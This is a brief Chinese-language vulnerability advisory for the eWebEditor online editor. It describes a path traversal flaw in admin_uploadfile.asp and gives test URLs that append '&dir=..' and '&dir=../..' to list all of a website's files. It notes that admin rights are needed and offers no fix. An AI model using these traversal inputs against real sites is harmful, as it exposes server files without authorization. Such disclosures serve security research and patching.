此漏洞比较危险...ewebeditor使用范围太广了...(前提也要有管理权限)
eWebEditor 
描述:
eWebEditor是一个所见即所得的在线编辑器。顾名思义，就是能在网络上使用所见即所得的编辑方式进行编辑图文并茂的文章、新闻、讨论贴、通告、记事等多种文字处理应用。
ewebeditor/admin_uploadfile.asp
过滤不严，造成遍历路径漏洞 
<* 参考:http://www.sebug.net,http://www.ewebeditor.net/ ;*> 
测试方法:
[警 告]以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.****.com/../.. 看到整个网站文件了  
建议:暂无http://www.ewebeditor.net/ ;